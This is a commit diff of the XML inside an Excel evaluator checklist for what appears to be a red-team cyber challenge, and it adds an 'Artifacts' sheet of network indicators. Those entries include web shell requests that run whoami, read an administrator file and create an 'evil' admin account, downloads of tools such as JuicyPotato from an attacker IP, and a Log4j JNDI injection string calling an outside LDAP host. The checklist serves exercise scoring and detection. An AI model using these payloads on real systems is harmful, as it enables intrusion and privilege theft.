<commit_message>
Added network artifact tab to Eval Checklist
</commit_message>
<xml_diff>
--- a/CyberChallengeEvaluatorChecklist.xlsx
+++ b/CyberChallengeEvaluatorChecklist.xlsx
@@ -5,17 +5,18 @@
   <workbookPr defaultThemeVersion="166925"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\12532\Desktop\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\jonathan\Documents\GitHub\CyberChallenge\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{700D8040-519D-456E-9FFD-98ACE56386E7}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{6574BF17-7F4A-4E0B-8C7E-6C941449C919}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15720" activeTab="2" xr2:uid="{D3576344-A792-4353-B944-796ECB867907}"/>
+    <workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15840" activeTab="3" xr2:uid="{D3576344-A792-4353-B944-796ECB867907}"/>
   </bookViews>
   <sheets>
     <sheet name="Red Actions on Objectives" sheetId="1" r:id="rId1"/>
     <sheet name="C2 Callbacks" sheetId="2" r:id="rId2"/>
     <sheet name="Red Team Space" sheetId="3" r:id="rId3"/>
+    <sheet name="Artifacts" sheetId="4" r:id="rId4"/>
   </sheets>
   <definedNames>
     <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'C2 Callbacks'!$A$2:$E$2</definedName>
@@ -42,7 +43,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="133" uniqueCount="89">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="183" uniqueCount="128">
   <si>
     <t>IP/Subnets</t>
   </si>
@@ -119,12 +120,6 @@
     <t>208.11.25.204</t>
   </si>
   <si>
-    <t>Login via SSH and some basic enumeration using pspy.py to check running processes.</t>
-  </si>
-  <si>
-    <t>exploit tar bar wildcard to obtain root</t>
-  </si>
-  <si>
     <t>Wait 1 minute for exploit to run its course, clean up exploit script, and then run malware in the background.</t>
   </si>
   <si>
@@ -143,9 +138,6 @@
     <t>HTTP / Port 8080</t>
   </si>
   <si>
-    <t>Manual Log4j exploit to obtain reverseshell and then create evil domain admin</t>
-  </si>
-  <si>
     <t>SMB / 445</t>
   </si>
   <si>
@@ -309,13 +301,139 @@
   </si>
   <si>
     <t>Phase 5 Attack System</t>
+  </si>
+  <si>
+    <t>Protocol/Port</t>
+  </si>
+  <si>
+    <t>Nework Artifacts</t>
+  </si>
+  <si>
+    <t>Phase</t>
+  </si>
+  <si>
+    <t>Type</t>
+  </si>
+  <si>
+    <t>URL/Web Request</t>
+  </si>
+  <si>
+    <t>http://208.11.26.100/uploads/IPDS-Schema.aspx?cmd=whoami</t>
+  </si>
+  <si>
+    <t>http://208.11.26.100/uploads/IPDS-Schema.aspx?cmd=dir</t>
+  </si>
+  <si>
+    <t>http://208.11.26.100/uploads/IPDS-Schema.aspx?cmd=type%20C%3A%5CUsers%5CAdministrator%5CDesktop%5Cdont%5Fforget%2Etxt</t>
+  </si>
+  <si>
+    <t>http://208.11.26.100/uploads/IPDS-Schema.aspx?cmd=net%20user%20%2Fadd%20evil%20password123%21</t>
+  </si>
+  <si>
+    <t>http://208.11.26.100/uploads/IPDS-Schema.aspx?cmd=net%20localgroup%20administrators%20evil%20%2Fadd</t>
+  </si>
+  <si>
+    <t>http://208.11.26.100/uploads/IPDS-Schema.aspx?cmd=dir%20C%3A%5CUsers%5CAdministrator%5CDesktop</t>
+  </si>
+  <si>
+    <t>Insecure Protocol</t>
+  </si>
+  <si>
+    <t>FTP Anonymous Login</t>
+  </si>
+  <si>
+    <t>Value / Details</t>
+  </si>
+  <si>
+    <t>Scanning</t>
+  </si>
+  <si>
+    <t>Credential Spraying</t>
+  </si>
+  <si>
+    <t>Multiple login SSH login attempts to 208.11.23.0/24 subnet from a single external host</t>
+  </si>
+  <si>
+    <t>http://94.249.192.5:8000/raichu</t>
+  </si>
+  <si>
+    <t>Multiple login SSH login attempts to 208.11.25.0/24 subnet from a single external host</t>
+  </si>
+  <si>
+    <t>http://94.249.192.5:8000/pspy</t>
+  </si>
+  <si>
+    <t>http://94.249.192.5:8000/backup.sh</t>
+  </si>
+  <si>
+    <t>exploit tar bar wildcard to obtain root using specifically crafted file</t>
+  </si>
+  <si>
+    <t>Login via SSH, download and run monitoring software  to check running processes.</t>
+  </si>
+  <si>
+    <t>Ping sweep on 208.11.26.0/24 subnet</t>
+  </si>
+  <si>
+    <t>Port Scan on 208.11.26.100</t>
+  </si>
+  <si>
+    <t>Ping sweep on 208.11.23.0/24 subnet</t>
+  </si>
+  <si>
+    <t>Ping sweep on 208.11.25.0/24 subnet</t>
+  </si>
+  <si>
+    <t>Ping sweeps on 208.11.20.0/24 &amp; 208.11.21.0/24 subnets</t>
+  </si>
+  <si>
+    <t>Port Scan on 208.11.21.100</t>
+  </si>
+  <si>
+    <t>LDAP Request</t>
+  </si>
+  <si>
+    <t>SMB Activity with External IPs</t>
+  </si>
+  <si>
+    <t>Suspicious SMB</t>
+  </si>
+  <si>
+    <t>http://94.249.192.5:8000/porygon.exe</t>
+  </si>
+  <si>
+    <t>http://94.249.192.5:8000/haunter.exe</t>
+  </si>
+  <si>
+    <t>Final Malware?</t>
+  </si>
+  <si>
+    <t>Manual Log4j exploit to obtain reverseshell, privilege escalation through SeImpersonate token abuse, and then create evil domain admin</t>
+  </si>
+  <si>
+    <t>Suspicious Port</t>
+  </si>
+  <si>
+    <t>TCP Connection to service on port 9001</t>
+  </si>
+  <si>
+    <t>http://94.249.192.5:8000/JuicyPotato.exe (name change)</t>
+  </si>
+  <si>
+    <t>ldap://94.249.192.1:1387/C (name change)</t>
+  </si>
+  <si>
+    <t>Malformed User-Agent: ${jndi:ldap://94.249.192.1:1387/C} (name change)</t>
+  </si>
+  <si>
+    <t>http://94.249.192.1:1337/C.class (name change)</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
-  <fonts count="2" x14ac:knownFonts="1">
+  <fonts count="3" x14ac:knownFonts="1">
     <font>
       <sz val="11"/>
       <color theme="1"/>
@@ -326,6 +444,14 @@
     <font>
       <b/>
       <sz val="14"/>
+      <color theme="1"/>
+      <name val="Calibri"/>
+      <family val="2"/>
+      <scheme val="minor"/>
+    </font>
+    <font>
+      <b/>
+      <sz val="11"/>
       <color theme="1"/>
       <name val="Calibri"/>
       <family val="2"/>
@@ -667,7 +793,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="38">
+  <cellXfs count="55">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
@@ -675,31 +801,7 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment horizontal="center" vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="1" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="1" fillId="2" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="1" fillId="2" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="0" fillId="2" borderId="3" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="0" fillId="2" borderId="5" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="1" fillId="2" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="1" fillId="2" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="1" fillId="2" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
     </xf>
     <xf numFmtId="0" fontId="0" fillId="3" borderId="17" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
@@ -744,7 +846,7 @@
     <xf numFmtId="0" fontId="0" fillId="4" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
     </xf>
     <xf numFmtId="0" fontId="0" fillId="4" borderId="20" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
@@ -779,6 +881,63 @@
     </xf>
     <xf numFmtId="0" fontId="0" fillId="5" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="3" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="5" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="10" xfId="0" applyFill="1" applyBorder="1"/>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="13" xfId="0" applyFill="1" applyBorder="1"/>
+    <xf numFmtId="0" fontId="2" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="2" fillId="2" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="2" fillId="2" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="3" borderId="17" xfId="0" applyFill="1" applyBorder="1"/>
+    <xf numFmtId="0" fontId="0" fillId="3" borderId="18" xfId="0" applyFill="1" applyBorder="1"/>
+    <xf numFmtId="0" fontId="0" fillId="3" borderId="19" xfId="0" applyFill="1" applyBorder="1"/>
+    <xf numFmtId="0" fontId="0" fillId="4" borderId="15" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="4" borderId="16" xfId="0" applyFill="1" applyBorder="1"/>
+    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="4" borderId="10" xfId="0" applyFill="1" applyBorder="1"/>
+    <xf numFmtId="0" fontId="0" fillId="4" borderId="9" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="4" borderId="12" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center"/>
     </xf>
   </cellXfs>
   <cellStyles count="1">
@@ -1097,387 +1256,387 @@
   <dimension ref="A1:D27"/>
   <sheetViews>
     <sheetView workbookViewId="0">
-      <selection activeCell="C9" sqref="C9"/>
+      <selection activeCell="D24" sqref="D24"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
   <cols>
     <col min="1" max="1" width="15.7109375" style="1" customWidth="1"/>
     <col min="2" max="3" width="25.7109375" style="1" customWidth="1"/>
-    <col min="4" max="4" width="90.7109375" style="2" customWidth="1"/>
+    <col min="4" max="4" width="85" style="2" customWidth="1"/>
     <col min="5" max="16384" width="9.140625" style="1"/>
   </cols>
   <sheetData>
     <row r="1" spans="1:4" ht="19.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A1" s="9" t="s">
+      <c r="A1" s="30" t="s">
         <v>2</v>
       </c>
-      <c r="B1" s="10"/>
-      <c r="C1" s="10"/>
-      <c r="D1" s="11"/>
+      <c r="B1" s="31"/>
+      <c r="C1" s="31"/>
+      <c r="D1" s="32"/>
     </row>
     <row r="2" spans="1:4" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A2" s="12" t="s">
+      <c r="A2" s="4" t="s">
         <v>3</v>
       </c>
-      <c r="B2" s="13" t="s">
+      <c r="B2" s="5" t="s">
         <v>0</v>
       </c>
-      <c r="C2" s="13" t="s">
+      <c r="C2" s="5" t="s">
         <v>1</v>
       </c>
-      <c r="D2" s="14" t="s">
+      <c r="D2" s="6" t="s">
         <v>10</v>
       </c>
     </row>
     <row r="3" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A3" s="15">
+      <c r="A3" s="7">
         <v>1</v>
       </c>
-      <c r="B3" s="16" t="s">
+      <c r="B3" s="8" t="s">
         <v>4</v>
       </c>
-      <c r="C3" s="16" t="s">
+      <c r="C3" s="8" t="s">
         <v>7</v>
       </c>
-      <c r="D3" s="17" t="s">
+      <c r="D3" s="9" t="s">
         <v>6</v>
       </c>
     </row>
     <row r="4" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A4" s="18">
+      <c r="A4" s="10">
         <v>1</v>
       </c>
-      <c r="B4" s="19" t="s">
+      <c r="B4" s="11" t="s">
         <v>5</v>
       </c>
-      <c r="C4" s="19" t="s">
+      <c r="C4" s="11" t="s">
         <v>8</v>
       </c>
-      <c r="D4" s="20" t="s">
+      <c r="D4" s="12" t="s">
         <v>9</v>
       </c>
     </row>
-    <row r="5" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A5" s="18">
+    <row r="5" spans="1:4" ht="30" x14ac:dyDescent="0.25">
+      <c r="A5" s="10">
         <v>1</v>
       </c>
-      <c r="B5" s="19" t="s">
+      <c r="B5" s="11" t="s">
         <v>5</v>
       </c>
-      <c r="C5" s="19" t="s">
+      <c r="C5" s="11" t="s">
         <v>15</v>
       </c>
-      <c r="D5" s="20" t="s">
+      <c r="D5" s="12" t="s">
         <v>11</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="30" x14ac:dyDescent="0.25">
-      <c r="A6" s="18">
+      <c r="A6" s="10">
         <v>1</v>
       </c>
-      <c r="B6" s="19" t="s">
+      <c r="B6" s="11" t="s">
         <v>5</v>
       </c>
-      <c r="C6" s="19" t="s">
+      <c r="C6" s="11" t="s">
         <v>15</v>
       </c>
-      <c r="D6" s="20" t="s">
+      <c r="D6" s="12" t="s">
         <v>12</v>
       </c>
     </row>
     <row r="7" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A7" s="18">
+      <c r="A7" s="10">
         <v>2</v>
       </c>
-      <c r="B7" s="19" t="s">
+      <c r="B7" s="11" t="s">
         <v>13</v>
       </c>
-      <c r="C7" s="19" t="s">
+      <c r="C7" s="11" t="s">
         <v>7</v>
       </c>
-      <c r="D7" s="20" t="s">
+      <c r="D7" s="12" t="s">
         <v>6</v>
       </c>
     </row>
     <row r="8" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A8" s="18">
+      <c r="A8" s="10">
         <v>2</v>
       </c>
-      <c r="B8" s="19" t="s">
+      <c r="B8" s="11" t="s">
         <v>13</v>
       </c>
-      <c r="C8" s="19" t="s">
+      <c r="C8" s="11" t="s">
         <v>14</v>
       </c>
-      <c r="D8" s="20" t="s">
+      <c r="D8" s="12" t="s">
         <v>16</v>
       </c>
     </row>
     <row r="9" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A9" s="18">
+      <c r="A9" s="10">
         <v>2</v>
       </c>
-      <c r="B9" s="19" t="s">
+      <c r="B9" s="11" t="s">
         <v>17</v>
       </c>
-      <c r="C9" s="19" t="s">
+      <c r="C9" s="11" t="s">
         <v>14</v>
       </c>
-      <c r="D9" s="20" t="s">
+      <c r="D9" s="12" t="s">
         <v>18</v>
       </c>
     </row>
     <row r="10" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A10" s="18">
+      <c r="A10" s="10">
         <v>2</v>
       </c>
-      <c r="B10" s="19" t="s">
+      <c r="B10" s="11" t="s">
         <v>17</v>
       </c>
-      <c r="C10" s="19" t="s">
+      <c r="C10" s="11" t="s">
         <v>14</v>
       </c>
-      <c r="D10" s="20" t="s">
+      <c r="D10" s="12" t="s">
         <v>19</v>
       </c>
     </row>
     <row r="11" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A11" s="18">
+      <c r="A11" s="10">
         <v>2</v>
       </c>
-      <c r="B11" s="19" t="s">
+      <c r="B11" s="11" t="s">
         <v>17</v>
       </c>
-      <c r="C11" s="19" t="s">
+      <c r="C11" s="11" t="s">
         <v>14</v>
       </c>
-      <c r="D11" s="20" t="s">
+      <c r="D11" s="12" t="s">
         <v>21</v>
       </c>
     </row>
     <row r="12" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A12" s="18">
+      <c r="A12" s="10">
         <v>2</v>
       </c>
-      <c r="B12" s="19" t="s">
+      <c r="B12" s="11" t="s">
         <v>17</v>
       </c>
-      <c r="C12" s="19" t="s">
+      <c r="C12" s="11" t="s">
         <v>14</v>
       </c>
-      <c r="D12" s="20" t="s">
+      <c r="D12" s="12" t="s">
         <v>22</v>
       </c>
     </row>
     <row r="13" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A13" s="18">
+      <c r="A13" s="10">
         <v>3</v>
       </c>
-      <c r="B13" s="19" t="s">
+      <c r="B13" s="11" t="s">
         <v>20</v>
       </c>
-      <c r="C13" s="19" t="s">
+      <c r="C13" s="11" t="s">
         <v>7</v>
       </c>
-      <c r="D13" s="20" t="s">
+      <c r="D13" s="12" t="s">
         <v>6</v>
       </c>
     </row>
     <row r="14" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A14" s="18">
+      <c r="A14" s="10">
         <v>3</v>
       </c>
-      <c r="B14" s="19" t="s">
+      <c r="B14" s="11" t="s">
         <v>20</v>
       </c>
-      <c r="C14" s="19" t="s">
+      <c r="C14" s="11" t="s">
         <v>14</v>
       </c>
-      <c r="D14" s="20" t="s">
+      <c r="D14" s="12" t="s">
         <v>23</v>
       </c>
     </row>
     <row r="15" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A15" s="18">
+      <c r="A15" s="10">
         <v>3</v>
       </c>
-      <c r="B15" s="19" t="s">
+      <c r="B15" s="11" t="s">
         <v>24</v>
       </c>
-      <c r="C15" s="19" t="s">
+      <c r="C15" s="11" t="s">
         <v>14</v>
       </c>
-      <c r="D15" s="20" t="s">
+      <c r="D15" s="12" t="s">
+        <v>108</v>
+      </c>
+    </row>
+    <row r="16" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A16" s="10">
+        <v>3</v>
+      </c>
+      <c r="B16" s="11" t="s">
+        <v>24</v>
+      </c>
+      <c r="C16" s="11" t="s">
+        <v>14</v>
+      </c>
+      <c r="D16" s="12" t="s">
+        <v>107</v>
+      </c>
+    </row>
+    <row r="17" spans="1:4" ht="30" x14ac:dyDescent="0.25">
+      <c r="A17" s="10">
+        <v>3</v>
+      </c>
+      <c r="B17" s="11" t="s">
+        <v>24</v>
+      </c>
+      <c r="C17" s="11" t="s">
+        <v>14</v>
+      </c>
+      <c r="D17" s="12" t="s">
         <v>25</v>
       </c>
     </row>
-    <row r="16" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A16" s="18">
-        <v>3</v>
-      </c>
-      <c r="B16" s="19" t="s">
-        <v>24</v>
-      </c>
-      <c r="C16" s="19" t="s">
+    <row r="18" spans="1:4" ht="30" x14ac:dyDescent="0.25">
+      <c r="A18" s="10">
+        <v>4</v>
+      </c>
+      <c r="B18" s="13" t="s">
+        <v>26</v>
+      </c>
+      <c r="C18" s="11" t="s">
+        <v>7</v>
+      </c>
+      <c r="D18" s="12" t="s">
+        <v>6</v>
+      </c>
+    </row>
+    <row r="19" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A19" s="10">
+        <v>4</v>
+      </c>
+      <c r="B19" s="13" t="s">
+        <v>27</v>
+      </c>
+      <c r="C19" s="11" t="s">
+        <v>28</v>
+      </c>
+      <c r="D19" s="12" t="s">
+        <v>29</v>
+      </c>
+    </row>
+    <row r="20" spans="1:4" ht="30" x14ac:dyDescent="0.25">
+      <c r="A20" s="10">
+        <v>4</v>
+      </c>
+      <c r="B20" s="13" t="s">
+        <v>27</v>
+      </c>
+      <c r="C20" s="11" t="s">
+        <v>30</v>
+      </c>
+      <c r="D20" s="12" t="s">
+        <v>121</v>
+      </c>
+    </row>
+    <row r="21" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A21" s="10">
+        <v>5</v>
+      </c>
+      <c r="B21" s="13" t="s">
+        <v>27</v>
+      </c>
+      <c r="C21" s="11" t="s">
+        <v>31</v>
+      </c>
+      <c r="D21" s="12" t="s">
+        <v>32</v>
+      </c>
+    </row>
+    <row r="22" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A22" s="10">
+        <v>5</v>
+      </c>
+      <c r="B22" s="13" t="s">
+        <v>27</v>
+      </c>
+      <c r="C22" s="11" t="s">
+        <v>33</v>
+      </c>
+      <c r="D22" s="12" t="s">
+        <v>34</v>
+      </c>
+    </row>
+    <row r="23" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A23" s="10">
+        <v>5</v>
+      </c>
+      <c r="B23" s="13" t="s">
+        <v>27</v>
+      </c>
+      <c r="C23" s="11" t="s">
+        <v>33</v>
+      </c>
+      <c r="D23" s="12" t="s">
+        <v>35</v>
+      </c>
+    </row>
+    <row r="24" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A24" s="10">
+        <v>5</v>
+      </c>
+      <c r="B24" s="13" t="s">
+        <v>27</v>
+      </c>
+      <c r="C24" s="11" t="s">
+        <v>33</v>
+      </c>
+      <c r="D24" s="12" t="s">
+        <v>36</v>
+      </c>
+    </row>
+    <row r="25" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A25" s="10">
+        <v>6</v>
+      </c>
+      <c r="B25" s="11" t="s">
+        <v>51</v>
+      </c>
+      <c r="C25" s="11" t="s">
+        <v>55</v>
+      </c>
+      <c r="D25" s="12" t="s">
+        <v>56</v>
+      </c>
+    </row>
+    <row r="26" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A26" s="10">
+        <v>6</v>
+      </c>
+      <c r="B26" s="11" t="s">
+        <v>54</v>
+      </c>
+      <c r="C26" s="11" t="s">
         <v>14</v>
       </c>
-      <c r="D16" s="20" t="s">
-        <v>26</v>
-      </c>
-    </row>
-    <row r="17" spans="1:4" ht="30" x14ac:dyDescent="0.25">
-      <c r="A17" s="18">
-        <v>3</v>
-      </c>
-      <c r="B17" s="19" t="s">
-        <v>24</v>
-      </c>
-      <c r="C17" s="19" t="s">
-        <v>14</v>
-      </c>
-      <c r="D17" s="20" t="s">
-        <v>27</v>
-      </c>
-    </row>
-    <row r="18" spans="1:4" ht="30" x14ac:dyDescent="0.25">
-      <c r="A18" s="18">
-        <v>4</v>
-      </c>
-      <c r="B18" s="21" t="s">
-        <v>28</v>
-      </c>
-      <c r="C18" s="19" t="s">
-        <v>7</v>
-      </c>
-      <c r="D18" s="20" t="s">
+      <c r="D26" s="12" t="s">
+        <v>57</v>
+      </c>
+    </row>
+    <row r="27" spans="1:4" ht="30.75" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="A27" s="14">
         <v>6</v>
       </c>
-    </row>
-    <row r="19" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A19" s="18">
-        <v>4</v>
-      </c>
-      <c r="B19" s="21" t="s">
-        <v>29</v>
-      </c>
-      <c r="C19" s="19" t="s">
-        <v>30</v>
-      </c>
-      <c r="D19" s="20" t="s">
-        <v>31</v>
-      </c>
-    </row>
-    <row r="20" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A20" s="18">
-        <v>4</v>
-      </c>
-      <c r="B20" s="21" t="s">
-        <v>29</v>
-      </c>
-      <c r="C20" s="19" t="s">
-        <v>32</v>
-      </c>
-      <c r="D20" s="20" t="s">
-        <v>33</v>
-      </c>
-    </row>
-    <row r="21" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A21" s="18">
-        <v>5</v>
-      </c>
-      <c r="B21" s="21" t="s">
-        <v>29</v>
-      </c>
-      <c r="C21" s="19" t="s">
-        <v>34</v>
-      </c>
-      <c r="D21" s="20" t="s">
-        <v>35</v>
-      </c>
-    </row>
-    <row r="22" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A22" s="18">
-        <v>5</v>
-      </c>
-      <c r="B22" s="21" t="s">
-        <v>29</v>
-      </c>
-      <c r="C22" s="19" t="s">
-        <v>36</v>
-      </c>
-      <c r="D22" s="20" t="s">
+      <c r="B27" s="15" t="s">
         <v>37</v>
       </c>
-    </row>
-    <row r="23" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A23" s="18">
-        <v>5</v>
-      </c>
-      <c r="B23" s="21" t="s">
-        <v>29</v>
-      </c>
-      <c r="C23" s="19" t="s">
-        <v>36</v>
-      </c>
-      <c r="D23" s="20" t="s">
+      <c r="C27" s="15" t="s">
         <v>38</v>
       </c>
-    </row>
-    <row r="24" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A24" s="18">
-        <v>5</v>
-      </c>
-      <c r="B24" s="21" t="s">
-        <v>29</v>
-      </c>
-      <c r="C24" s="19" t="s">
-        <v>36</v>
-      </c>
-      <c r="D24" s="20" t="s">
+      <c r="D27" s="16" t="s">
         <v>39</v>
-      </c>
-    </row>
-    <row r="25" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A25" s="18">
-        <v>6</v>
-      </c>
-      <c r="B25" s="19" t="s">
-        <v>54</v>
-      </c>
-      <c r="C25" s="19" t="s">
-        <v>58</v>
-      </c>
-      <c r="D25" s="20" t="s">
-        <v>59</v>
-      </c>
-    </row>
-    <row r="26" spans="1:4" x14ac:dyDescent="0.25">
